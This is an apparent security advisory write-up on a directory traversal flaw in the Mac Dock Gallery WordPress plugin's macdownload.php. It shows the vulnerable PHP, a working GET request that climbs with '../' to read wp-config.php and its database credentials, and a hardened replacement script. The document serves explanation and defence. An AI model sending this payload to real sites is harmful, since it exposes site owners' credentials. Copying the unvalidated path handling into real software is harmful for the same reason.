Advisory
Secunia Advisory SA 49650
Analysis
This vulnerability relies on a lack of validation of the "albid" parameter in macdownload.php, which is concatenated straight into a filesystem path that is then read by readfile() at line 37 and sent as the response body. The script performs no authentication or authorization check of its own and never normalises the path, so "../" sequences in "albid" walk out of the uploads directory. This causes an arbitrary file disclosure (directory traversal) vulnerability.
```php
<?php
require_once( dirname(__FILE__) . '/macDirectory.php');
$folder = dirname(plugin_basename(__FILE__));
// "albid" is taken straight from the query string and concatenated into the
// path with no validation, so "../" sequences walk out of the uploads directory.
$file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
// The attacker-controlled path is streamed back as the response body.
readfile($file);
?>
```
A request like the following makes the script read out wp-config.php, which contains the database credentials. The three "../" components climb from wp-content/uploads/mac-dock-gallery/ up to the WordPress root, and because readfile() sends the raw bytes of the file rather than executing it, the PHP source, including the DB_NAME, DB_USER and DB_PASSWORD definitions, is returned verbatim in the response body.
```http
GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1
Host: 192.168.80.130
```
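The following is an added example of how the download script above could be hardened; it is not the plugin's own code or a vendor patch. It assumes the same directory layout the vulnerable script uses (the files to serve live under wp-content/uploads/mac-dock-gallery/) and keeps the same response headers. The request shown above is rejected with a 404, because basename() reduces the "albid" value to "wp-config.php", which does not exist inside the gallery directory, and the realpath() prefix check catches anything (symlinks included) that resolves outside it.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for
// macdownload.php that only serves regular files inside the gallery directory.

// Resolve the allowed base directory once; realpath() returns false if it
// does not exist, in which case nothing can be served.
$base = realpath( dirname(dirname(dirname(__FILE__))) . '/uploads/mac-dock-gallery' );
if ( $base === false ) {
    http_response_code(404);
    exit;
}

// Keep only the final path component: this discards any directory part,
// including "../" sequences and absolute paths.
$name = isset($_GET['albid']) ? basename((string) $_GET['albid']) : '';
if ( $name === '' || $name === '.' || $name === '..' || strpos($name, "\0") !== false ) {
    http_response_code(400);
    exit;
}

// Resolve the candidate path (following symlinks) and confirm it is still
// strictly below $base and is a regular file, not a directory.
$file = realpath( $base . DIRECTORY_SEPARATOR . $name );
if ( $file === false
    || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0
    || ! is_file($file) ) {
    http_response_code(404);
    exit;
}

header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
// basename($file) is now a single safe component; quote it for the header.
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
readfile($file);
?>
```

The null-byte check matters because realpath() in current PHP versions throws a ValueError on paths containing "\0", which would otherwise turn a malformed request into a 500 rather than a clean rejection. If the gallery only ever holds image files, a further improvement is to accept only a fixed list of extensions, which turns the check into an allow-list rather than relying solely on path containment.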